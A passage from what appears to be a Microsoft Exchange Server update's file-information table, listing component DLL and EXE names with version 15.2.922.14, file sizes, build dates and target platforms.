25-Sep-21| 3:22| x86 \nMicrosoft.exchange.data.directory.dll| 15.2.922.14| 7,796,104| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.2.922.14| 80,264| 25-Sep-21| 2:15| x64 \nMicrosoft.exchange.data.dll| 15.2.922.14| 1,967,992| 25-Sep-21| 2:51| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.2.922.14| 1,632,120| 25-Sep-21| 3:49| x86 \nMicrosoft.exchange.data.ha.dll| 15.2.922.14| 377,720| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.2.922.14| 105,352| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.2.922.14| 15,736| 25-Sep-21| 3:14| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.2.922.14| 224,632| 25-Sep-21| 3:22| x86 \nMicrosoft.exchange.data.mapi.dll| 15.2.922.14| 186,744| 25-Sep-21| 3:22| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.2.922.14| 39,824| 25-Sep-21| 2:28| x86 \nMicrosoft.exchange.data.metering.dll| 15.2.922.14| 119,176| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.2.922.14| 968,080| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.data.notification.dll| 15.2.922.14| 141,176| 25-Sep-21| 3:16| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.2.922.14| 769,424| 25-Sep-21| 2:34| x86 \nMicrosoft.exchange.data.providers.dll| 15.2.922.14| 139,640| 25-Sep-21| 3:14| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.2.922.14| 56,696| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.2.922.14| 452,984| 25-Sep-21| 3:06| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.2.922.14| 32,632| 25-Sep-21| 3:15| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.2.922.14| 256,888| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.data.storage.dll| 15.2.922.14| #########| 25-Sep-21| 3:13| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.2.922.14| 37,776| 25-Sep-21| 2:10| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.2.922.14| 655,752| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.2.922.14| 175,480| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.2.922.14| 36,216| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.2.922.14| 14,216| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.2.922.14| 14,216| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.2.922.14| 14,736| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.2.922.14| 72,568| 25-Sep-21| 4:34| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.2.922.14| 13,192| 25-Sep-21| 2:13| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.2.922.14| 22,928| 25-Sep-21| 3:06| x86 \nMicrosoft.exchange.diagnostics.dll| 15.2.922.14| 1,815,936| 25-Sep-21| 2:18| x86 \nMicrosoft.exchange.diagnostics.dll.deploy| 15.2.922.14| 1,815,936| 25-Sep-21| 2:18| Not applicable \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.2.922.14| 23,936| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.2.922.14| 546,704| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.2.922.14| 215,416| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.2.922.14| 194,424| 25-Sep-21| 3:35| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.2.922.14| 146,296| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.2.922.14| 27,536| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.2.922.14| 13,704| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.2.922.14| 49,552| 25-Sep-21| 3:50| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.2.922.14| 28,024| 25-Sep-21| 2:15| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.2.922.14| 208,760| 25-Sep-21| 3:33| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.2.922.14| 88,976| 25-Sep-21| 2:09| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.2.922.14| 32,648| 25-Sep-21| 2:28| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.2.922.14| 45,960| 25-Sep-21| 4:04| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.2.922.14| 18,824| 25-Sep-21| 4:01| x86 \nMicrosoft.exchange.dxstore.dll| 15.2.922.14| 473,464| 25-Sep-21| 2:34| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.2.922.14| 206,200| 25-Sep-21| 2:09| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.2.922.14| 36,736| 25-Sep-21| 3:56| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.2.922.14| 131,472| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.2.922.14| 21,904| 25-Sep-21| 3:04| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.2.922.14| 148,368| 25-Sep-21| 3:05| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.2.922.14| 220,048| 25-Sep-21| 3:08| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.2.922.14| 23,928| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.2.922.14| 97,656| 25-Sep-21| 3:07| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.2.922.14| 1,266,560| 25-Sep-21| 2:28| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.2.922.14| 1,266,560| 25-Sep-21| 2:28| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,495| 25-Sep-21| 2:28| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.2.922.14| 87,440| 25-Sep-21| 2:27| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,457| 25-Sep-21| 2:28| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.2.922.14| 52,112| 25-Sep-21| 2:10| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.2.922.14| 292,216| 25-Sep-21| 4:16| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.2.922.14| 73,104| 25-Sep-21| 4:02| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.2.922.14| 45,944| 25-Sep-21| 3:15| x86 \nMicrosoft.exchange.entities.booking.dll| 15.2.922.14| 218,488| 25-Sep-21| 4:02| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.2.922.14| 78,208| 25-Sep-21| 3:26| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.2.922.14| 35,728| 25-Sep-21| 3:26| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.2.922.14| 935,304| 25-Sep-21| 3:59| x86 \nMicrosoft.exchange.entities.common.dll| 15.2.922.14| 336,248| 25-Sep-21| 3:23| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.2.922.14| 52,624| 25-Sep-21| 3:24| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.2.922.14| 32,144| 25-Sep-21| 3:35| x86 \nMicrosoft.exchange.entities.context.dll| 15.2.922.14| 60,792| 25-Sep-21| 3:33| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.2.922.14| 854,392| 25-Sep-21| 3:22| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.2.922.14| 291,720| 25-Sep-21| 4:03| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.2.922.14| 39,312| 25-Sep-21| 3:36| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.2.922.14| 76,152| 25-Sep-21| 4:01| x86 \nMicrosoft.exchange.entities.insights.dll| 15.2.922.14| 166,792| 25-Sep-21| 4:06| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.2.922.14| 1,486,736| 25-Sep-21| 4:10| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.2.922.14| 122,248| 25-Sep-21| 4:02| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.2.922.14| #########| 25-Sep-21| 4:15| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.2.922.14| 264,080| 25-Sep-21| 3:37| x86 \nMicrosoft.exchange.entities.people.dll| 15.2.922.14| 37,760| 25-Sep-21| 3:33| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.2.922.14| 186,744| 25-Sep-21| 4:01| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.2.922.14| 64,376| 25-Sep-21| 4:03| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.2.922.14| 83,832| 25-Sep-21| 4:03| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.2.922.14| 63,864| 25-Sep-21| 3:14| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.2.922.14| 100,240| 25-Sep-21| 3:40| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.2.922.14| 144,784| 25-Sep-21| 3:27| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.2.922.14| 270,216| 25-Sep-21| 4:03| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.2.922.14| 15,224| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.2.922.14| 15,760| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.eserepl.dll| 15.2.922.14| 131,984| 25-Sep-21| 2:55| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.2.922.14| 254,328| 25-Sep-21| 3:15| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.2.922.14| 13,200| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.2.922.14| 37,256| 25-Sep-21| 4:31| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.2.922.14| 640,888| 25-Sep-21| 2:47| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.2.922.14| 37,240| 25-Sep-21| 3:22| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.2.922.14| 146,312| 25-Sep-21| 4:42| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.2.922.14| 13,184| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.2.922.14| 596,856| 25-Sep-21| 4:44| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.2.922.14| 14,736| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.2.922.14| 30,096| 25-Sep-21| 5:25| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.2.922.14| 99,728| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.2.922.14| 42,376| 25-Sep-21| 2:28| x86 \nMicrosoft.exchange.helpprovider.dll| 15.2.922.14| 40,336| 25-Sep-21| 3:45| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.2.922.14| 54,136| 25-Sep-21| 3:54| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.2.922.14| 164,240| 25-Sep-21| 3:35| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.2.922.14| 58,752| 25-Sep-21| 3:52| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.2.922.14| 204,680| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.2.922.14| 17,808| 25-Sep-21| 2:52| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.2.922.14| 30,584| 25-Sep-21| 3:54| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.2.922.14| 38,784| 25-Sep-21| 3:56| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.2.922.14| 48,504| 25-Sep-21| 3:54| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.2.922.14| 180,624| 25-Sep-21| 3:37| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.2.922.14| 36,728| 25-Sep-21| 4:43| x86 \nMicrosoft.exchange.httprequestfiltering.dll| 15.2.922.14| 28,024| 25-Sep-21| 2:34| x86 \nMicrosoft.exchange.httputilities.dll| 15.2.922.14| 25,976| 25-Sep-21| 3:54| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.2.922.14| 1,868,664| 25-Sep-21| 3:51| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.2.922.14| 54,664| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.2.922.14| 35,704| 25-Sep-21| 4:35| x86 \nMicrosoft.exchange.idserialization.dll| 15.2.922.14| 35,712| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.2.922.14| 18,312| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.2.922.14| 18,312| 25-Sep-21| 2:12| Not applicable \nMicrosoft.exchange.imap4.exe| 15.2.922.14| 263,056| 25-Sep-21| 3:39| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.2.922.14| 263,056| 25-Sep-21| 3:39| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.2.922.14| 24,968| 25-Sep-21| 3:36| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.2.922.14| 24,968| 25-Sep-21| 3:36| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.2.922.14| 53,128| 25-Sep-21| 2:33| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.2.922.14| 216,952| 25-Sep-21| 3:15| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.2.922.14| 32,144| 25-Sep-21| 4:10| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.2.922.14| 281,976| 25-Sep-21| 4:08| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.2.922.14| 18,808| 25-Sep-21| 3:15| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.2.922.14| 83,832| 25-Sep-21| 4:02| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.2.922.14| 15,240| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.2.922.14| 94,088| 25-Sep-21| 2:28| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.2.922.14| 1,841,016| 25-Sep-21| 3:52| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.2.922.14| 71,544| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.2.922.14| 175,488| 25-Sep-21| 3:55| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.2.922.14| 45,952| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.2.922.14| 159,624| 25-Sep-21| 2:13| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.2.922.14| 51,080| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.2.922.14| 45,960| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.2.922.14| 32,136| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.2.922.14| 100,232| 25-Sep-21| 2:18| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.2.922.14| 13,176| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.2.922.14| 271,248| 25-Sep-21| 4:44| x86 \nMicrosoft.exchange.killswitch.dll| 15.2.922.14| 22,408| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.2.922.14| 33,672| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.2.922.14| 18,320| 25-Sep-21| 2:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.2.922.14| 15,224| 25-Sep-21| 2:18| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.2.922.14| 27,536| 25-Sep-21| 2:18| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.2.922.14| 30,584| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.2.922.14| 22,416| 25-Sep-21| 2:18| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.2.922.14| 66,448| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.2.922.14| 29,560| 25-Sep-21| 2:28| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.2.922.14| 19,848| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.2.922.14| 20,344| 25-Sep-21| 2:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.2.922.14| 19,320| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.2.922.14| 34,168| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.2.922.14| 103,800| 25-Sep-21| 2:18| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.2.922.14| 31,632| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.2.922.14| 15,760| 25-Sep-21| 2:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.2.922.14| 20,872| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.2.922.14| 16,248| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.2.922.14| 49,016| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.2.922.14| 44,408| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.2.922.14| 38,280| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.2.922.14| #########| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.2.922.14| 29,064| 25-Sep-21| 2:15| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.2.922.14| 21,384| 25-Sep-21| 2:12| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.2.922.14| 24,440| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.2.922.14| 15,248| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.2.922.14| 21,904| 25-Sep-21| 2:15| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.2.922.14| 89,488| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.2.922.14| 20,872| 25-Sep-21| 2:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.2.922.14| 26,512| 25-Sep-21| 2:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.2.922.14| 21,384| 25-Sep-21| 2:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.2.922.14| 28,048| 25-Sep-21| 2:10| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.2.922.14| 28,536| 25-Sep-21| 2:18| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.2.922.14| 36,216| 25-Sep-21| 2:15| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.2.922.14| 16,784| 25-Sep-21| 2:15| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.2.922.14| 19,832| 25-Sep-21| 2:15| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.2.922.14| 15,232| 25-Sep-21| 2:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.2.922.14| 17,288| 25-Sep-21| 2:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.2.922.14| 19,856| 25-Sep-21| 2:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.2.922.14| 57,224| 25-Sep-21| 2:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.2.922.14| 17,784| 25-Sep-21| 2:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.2.922.14| 18,832| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.2.922.14| 16,272| 25-Sep-21| 2:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.2.922.14| 17,808| 25-Sep-21| 2:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.2.922.14| 15,248| 25-Sep-21| 2:15| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.2.922.14| 15,224| 25-Sep-21| 2:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.2.922.14| 52,616| 25-Sep-21| 2:10| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.2.922.14| 18,296| 25-Sep-21| 2:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.2.922.14| 34,192| 25-Sep-21| 2:10| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.2.922.14| 17,272| 25-Sep-21| 3:03| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.2.922.14| 18,824| 25-Sep-21| 2:12| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.2.922.14| 43,408| 25-Sep-21| 2:12| x86 \nMicrosoft.exchange.loguploader.dll| 15.2.922.14| 165,240| 25-Sep-21| 2:40| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.2.922.14| 54,672| 25-Sep-21| 2:34| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.2.922.14| 9,060,232| 25-Sep-21| 5:13| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.2.922.14| 33,160| 25-Sep-21| 3:37| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.2.922.14| 124,280| 25-Sep-21| 3:56| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.2.922.14| 82,824| 25-Sep-21| 2:09| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.2.922.14| 14,216| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.2.922.14| 30,080| 25-Sep-21| 3:59| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.2.922.14| 661,384| 25-Sep-21| 4:08| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.2.922.14| 63,368| 25-Sep-21| 3:49| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.2.922.14| 175,480| 25-Sep-21| 4:01| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.2.922.14| 2,793,872| 25-Sep-21| 3:57| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.2.922.14| 53,112| 25-Sep-21| 3:59| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.2.922.14| 151,928| 25-Sep-21| 3:59| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.2.922.14| 967,048| 25-Sep-21| 4:05| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.2.922.14| 185,208| 25-Sep-21| 4:00| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.2.922.14| 31,624| 25-Sep-21| 2:13| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.2.922.14| 39,800| 25-Sep-21| 4:00| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.2.922.14| 105,864| 25-Sep-21| 3:59| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.2.922.14| 95,112| 25-Sep-21| 3:59| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.2.922.14| 43,392| 25-Sep-21| 3:59| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.2.922.14| 18,824| 25-Sep-21| 2:28| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.2.922.14| 172,936| 25-Sep-21| 4:05| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.2.922.14| 102,776| 25-Sep-21| 4:00| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.2.922.14| 98,680| 25-Sep-21| 4:01| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.2.922.14| 188,808| 25-Sep-21| 4:02| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.2.922.14| 43,384| 25-Sep-21| 4:02| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.2.922.14| 447,352| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.2.922.14| 90,000| 25-Sep-21| 4:04| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.2.922.14| 107,912| 25-Sep-21| 5:25| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.2.922.14| 371,088| 25-Sep-21| 4:09| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.2.922.14| 193,936| 25-Sep-21| 3:51| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.2.922.14| 552,336| 25-Sep-21| 3:56| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.2.922.14| 16,272| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.2.922.14| 15,752| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.2.922.14| 321,400| 25-Sep-21| 4:08| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.2.922.14| 17,800| 25-Sep-21| 2:13| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.2.922.14| 45,432| 25-Sep-21| 3:53| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.2.922.14| 18,304| 25-Sep-21| 3:47| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.2.922.14| 12,688| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.2.922.14| 20,872| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.2.922.14| 415,120| 25-Sep-21| 3:33| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.2.922.14| 1,269,640| 25-Sep-21| 2:40| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.2.922.14| 41,864| 25-Sep-21| 3:47| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.2.922.14| 433,552| 25-Sep-21| 2:28| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.2.922.14| 4,566,408| 25-Sep-21| 6:21| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.2.922.14| 261,000| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.2.922.14| 33,656| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.2.922.14| 94,088| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.management.deployment.dll| 15.2.922.14| 586,128| 25-Sep-21| 3:48| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.2.922.14| 3,543,432| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.2.922.14| 67,976| 25-Sep-21| 4:47| x86 \nMicrosoft.exchange.management.dll| 15.2.922.14| #########| 25-Sep-21| 4:29| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.2.922.14| 58,760| 25-Sep-21| 4:35| x86 